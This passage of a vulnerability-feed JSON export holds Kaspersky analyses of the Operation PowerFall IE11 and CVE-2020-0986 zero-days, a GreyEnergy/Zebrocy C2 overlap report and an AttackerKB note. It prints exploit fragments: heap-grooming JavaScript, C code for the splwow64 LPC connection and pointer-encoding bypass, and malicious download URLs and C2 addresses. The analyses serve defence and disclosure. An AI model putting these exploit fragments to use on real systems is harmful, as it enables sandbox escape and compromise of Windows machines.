reclaimed during a call to the _valueOf() _function. Additionally, the attacker can control at what index the returned value is written. However, in the case when "arguments.length = 0;"and "arguments.push(O2);" are replaced in PoC with "arguments[0] = O2;" then _Js::JavascriptConversion::ToFloat_Helper() _will not trigger the bug because implicit calls will be disabled and it will not perform a call to the _valueOf()_ function.\n\nTo ensure that the function _func()_ is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that _func()_ is executed once more, triggering the bug. To free ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. The function _postMessage()_ can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the _Sleep()_ function: it is a while loop that checks for the time lapse between _Date.now() _and the previously stored value. After that, the exploit reclaims the memory with integer arrays.\n \n \n for (var i = 0; i < T.length; i += 1) {\n T[i] = new Array((0x1000 - 0x20) / 4);\n T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket\n }\n\nWhen a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE's custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at the offset 0x14 of LargeHeapBlock with 0, which happens to be the allocated block count.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png>)\n\n**_LargeHeapBlock structure for jscript9.dll x86_**\n\n_ _After that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the _CollectGarbage()_ function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large amount of integer arrays in hopes of reclaiming the previously freed array buffers. The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.\n \n \n for (var i = 0; i < K.length; i += 1) {\n K[i] = new Array((0x1000 - 0x20) / 4);\n K[i][0] = 0x888; // store magic\n }\n \n for (var i = 0; i < T.length; i += 1) {\n if (T[i][0] == 0x888) { // find array accessible through dangling pointer\n R = T[i];\n break;\n }\n }\n\nAs a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.\n\nAfter the building of the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array's vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function _VirtualProtect()_, which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string "split" and the address of the function: _JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>()_. The address of the Unicode string "split" is used to get a code reference to the string and with its help, to resolve the address of the function _Js::JavascriptString::EntrySplit()_, which implements the string method _split()_. The address of the function _LinkToBeginning<ThreadContext>() _is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the _split() _method and an object with an overridden _valueOf()_ method is provided as a _limit _argument. When the overridden _valueOf()_ method is executed during the execution of the function _Js::JavascriptString::EntrySplit()_, the exploit will search the thread's stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.\n\n## Next stage\n\nThe shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.\n\nThe ok.exe executable contains is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative back in December 2019. Due to the patch not being released for six months since the original report, ZDI posted a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) for this vulnerability as a zero-day on May 19, 2020. The next day, the vulnerability was exploited in the previously mentioned attack.\n\nThe vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\$v=vs.85\$>) protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png>)\n\n**_Execution of a malicious PowerShell command from splwow64.exe_**\n\nThe main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.\n\n## IoCs\n\n[www[.]static-cdn1[.]com/update.zip](<https://opentip.kaspersky.com/www.static-cdn1.com%2Fupdate.zip/>) \n[B06F1F2D3C016D13307BC7CE47C90594](<https://opentip.kaspersky.com/B06F1F2D3C016D13307BC7CE47C90594/>) \n[D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199](<https://opentip.kaspersky.com/D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199/>) \n[5877EAECA1FE8A3A15D6C8C5D7FA240B](<https://opentip.kaspersky.com/5877EAECA1FE8A3A15D6C8C5D7FA240B/>) \n[7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B](<https://opentip.kaspersky.com/7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B/>) \n[B72731B699922608FF3844CCC8FC36B4](<https://opentip.kaspersky.com/B72731B699922608FF3844CCC8FC36B4/>) \n[7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1](<https://opentip.kaspersky.com/7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1/>) \n[E01254D7AF1D044E555032E1F78FF38F](<https://opentip.kaspersky.com/E01254D7AF1D044E555032E1F78FF38F/>) \n[81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24](<https://opentip.kaspersky.com/81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24/>)", "cvss3": {}, "published": "2020-08-12T07:00:28", "type": "securelist", "title": "Internet Explorer and Windows zero-day exploits used in Operation PowerFall", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-1429", "CVE-2020-0674", "CVE-2020-0986", "CVE-2020-1380"], "modified": "2020-08-12T07:00:28", "id": "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "href": "https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T16:17:54", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130423/securelist_abs_8-990x400.jpg)\n\nIn August 2020, we published a blog post about [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let's take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\n\n## CVE-2020-0986\n\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in [GDI Print](<https://docs.microsoft.com/en-us/windows/win32/printdocs/about-the-gdi-print-api>)/[Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler-api>) API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. "Print driver host for applications," as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe's LPC server.\n \n \n typedef struct _PORT_VIEW\n {\n \tUINT64 Length;\n \tHANDLE SectionHandle;\n \tUINT64 SectionOffset;\n \tUINT64 ViewSize;\n \tUCHAR* ViewBase;\n \tUCHAR* ViewRemoteBase;\n } PORT_VIEW, *PPORT_VIEW;\n \n PORT_VIEW ClientView;\n \n typedef struct _PORT_MESSAGE_HEADER {\n \tUSHORT DataSize;\n \tUSHORT MessageSize;\n \tUSHORT MessageType;\n \tUSHORT VirtualRangesOffset;\n \tCLIENT_ID ClientId;\n \tUINT64 MessageId;\n \tUINT64 SectionSize;\n } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n \n PROXY_MSG LpcReply;\n PROXY_MSG LpcRequest;\n \n int GetPortName(PUNICODE_STRING DestinationString)\n {\n \tvoid *tokenHandle;\n \tDWORD sessionId;\n \tULONG length;\n \n \tint tokenInformation[16];\n \tWCHAR dst[256];\n \n \tmemset(tokenInformation, 0, sizeof(tokenInformation));\n \tProcessIdToSessionId(GetCurrentProcessId(), &sessionId);\n \n \tmemset(dst, 0, sizeof(dst));\n \n \tif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle)\n \t\t|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length))\n \t{\n \t\treturn 0;\n \t}\n \n \twsprintfW(\n \t\tdst,\n \t\tL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\n \t\tsessionId,\n \t\ttokenInformation[2],\n \t\ttokenInformation[3],\n \t\t0x2000);\n \tRtlInitUnicodeString(DestinationString, dst);\n \n \treturn 1;\n }\n \n HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\n {\n \tHANDLE sectionHandle = 0;\n \tHANDLE portHandle = 0;\n \tunion _LARGE_INTEGER maximumSize;\n \tmaximumSize.QuadPart = 0x20000;\n \n \tNtCreateSection(&sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, NULL);\n \tif (sectionHandle)\n \t{\n \t\tClientView.SectionHandle = sectionHandle;\n \t\tClientView.Length = 0x30;\n \t\tClientView.ViewSize = 0x9000;\n \t\tZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL);\n \t}\n \n \treturn portHandle;\n }\n \n int main()\n {\n \tprintf(\"Spawn splwow64.exe\\n\");\n \tCHAR Path[0x100];\n \tGetCurrentDirectoryA(sizeof(Path), Path);\n \tPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\n \tWinExec(Path, 0);\n \tSleep(1000);\n \n \tCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL, NULL);\n \n \tprintf(\"Get port name\\n\");\n \tUNICODE_STRING portName;\n \tif (!GetPortName(&portName))\n \t{\n \t\tprintf(\"Failed to get port name\\n\");\n \t\treturn 0;\n \t}\n \n \tprintf(\"Create port\\n\");\n \tHANDLE portHandle = CreatePortSharedBuffer(&portName);\n \tif (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase))\n \t{\n \t\tprintf(\"Failed to create port\\n\");\n \t\treturn 0;\n \t}\n }\n\nTo send data to the LPC server it's enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().\n \n \n memset(&LpcRequest, 0, sizeof(LpcRequest));\n LpcRequest.MessageHeader.DataSize = 0x20;\n LpcRequest.MessageHeader.MessageSize = 0x48;\n \n LpcRequest.InputBufSize = 0x88;\n LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\n LpcRequest.OutputBufSize = 0x10;\n LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\n \n // TODO: Prepare printer command\n \n NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);\n\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes _LpcRequest_ as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. Almost a complete list of different function INDEX values can be found in the header file _winddi.h_. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that that are a number of special INDEX values and some of them are provided in the table below (to find them in binary, look for calls to PROXYPORT::SendRequest).\n \n \n 106 \u2013 INDEX_LoadDriver\n 107 - INDEX_UnloadDriver\n 109 \u2013 INDEX_DocumentEvent\n 110 \u2013 INDEX_StartDocPrinterW\n 111 \u2013 INDEX_StartPagePrinter\n 112 \u2013 INDEX_EndPagePrinter\n 113 \u2013 INDEX_EndDocPrinter\n 114 \u2013 INDEX_AbortPrinter\n 115 \u2013 INDEX_ResetPrinterW\n 116 \u2013 INDEX_QueryColorProfile\n\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\n \n \n if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7))\n {\n // \u2026\n GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\n }\n\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them \u2013 namely INDEX_DocumentEvent \u2013 contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. After the check it will use the function DecodePointer to decode the pointer of the function stored at the _fpDocumentEvent_ global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.\n\n## Exploitation\n\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the _fpDocumentEvent_ pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the _fpDocumentEvent_ pointer. The value of the raw pointer is protected using [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\$v=vs.85\$>) protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the _fpDocumentEvent_ pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. The necessary calculations are provided below.\n \n \n // Calculate secret for pointer encoding\n while (1)\n {\n \tsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F);\n \tif ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent)\n \t\tbreak;\n \tif (++i > 0x3F)\n \t{\n \t\tsecret = 0;\n \t\tbreak;\n \t}\n }\n \n // Encode LoadLibraryA pointer with calculated secret\n UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);\n\nAt this stage, in order to achieve code execution from the splwow64.exe process, it's sufficient to overwrite the _fpDocumentEvent_ pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png>)\n\n**_Overview of attack_**\n\n## CVE-2019-0880\n\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available [here](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>). It's another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn't notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. Even fixing a couple of calls to memcpy doesn't really help.\n\n## Arbitrary pointer dereference host for applications\n\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let's take a look again at the format of the LPC request message.\n \n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n\n_InputBuf_ and _OutputBuf_ are both pointers that should point to a shared memory region. _InputBuf_ points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as _OutputBuf_. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers _InputBuf_ and _OutputBuf_ are fully controllable from the LPC client and manipulation of the _OutputBuf_ pointer can lead to an overwrite of splwow64.exe's process memory.\n\n## How it was mitigated\n\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of _OutputBuf_ vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it's safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as _OutputBuf_ without a handle check, but exploitation in such a scenario doesn't appear to be feasible.", "cvss3": {}, "published": "2020-09-02T10:00:56", "type": "securelist", "title": "Operation PowerFall: CVE-2020-0986 and variants", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0880", "CVE-2020-0986"], "modified": "2020-09-02T10:00:56", "id": "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "href": "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-24T16:53:08", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/05121854/Abstract-technology-990x400.jpeg)\n\nIn October 2018, ESET published a[ report](<https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf>) describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.\n\n[Kaspersky Lab ICS CERT](<https://ics-cert.kaspersky.com/>) has identified an overlap between GreyEnergy and a Sofacy subset called [\"Zebrocy\"](<https://securelist.com/a-slice-of-2017-sofacy-activity/83930/>). The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy's targets are widely spread across the Middle East, Europe and Asia and the targets' profiles are mostly government-related.\n\nBoth sets of activity used the same servers at the same time and targeted the same organization.\n\n## **Details**\n\n### **Servers**\n\nIn our private APT Intel report from July 2018 \"Zebrocy implements new VBA anti-sandboxing tricks\", details were provided about different Zebrocy C2 servers, including **193.23.181[.]151**.\n\nIn the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions **\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim\u00b4s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:cs-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-01-24T20:16:01", "description": "Windows Kernel Information Disclosure Vulnerability \nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memory from a user mode process.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:23pm UTC reported:\n\nAh good old `NtQuerySystemInformation()` strikes again, never quite going out of style :) In this case CVE-2021-31955 is an information disclosure in good old `ntoskrnl.exe`, aka the Windows kernel itself, that occurs due to a Windows feature supported since Windows Vista known as SuperFetch. By sending a `SystemSuperfetchInformation` class request of type `SuperfetchPrivSourceQuery` via the undocumented `NtQuerySystemInformation()` function, one can obtain the kernel address of the `EPROCESS` structure for the current process. This is REALLY bad since the `EPROCESS` kernel structure contains also contains a pointer to the process\u2019s permissions token. If we know the address of this token, then, provided one has an arbitrary kernel write vulnerability, they can easily overwrite this pointer to point to the permissions token for a higher privilege process, and if this process is running as SYSTEM, they will gain SYSTEM level code execution.\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>, this was used in the wild alongside CVE-2021-31956 to escape the Chrome sandbox and gain SYSTEM on affected users computers, after first compromising Chrome and gaining execution inside the Chrome sandbox with what is suspected to be CVE-2021-21224.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "href": "https://attackerkb.com/topics/NQpSb1TpCN/cve-2021-31955", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-25T11:15:03", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML 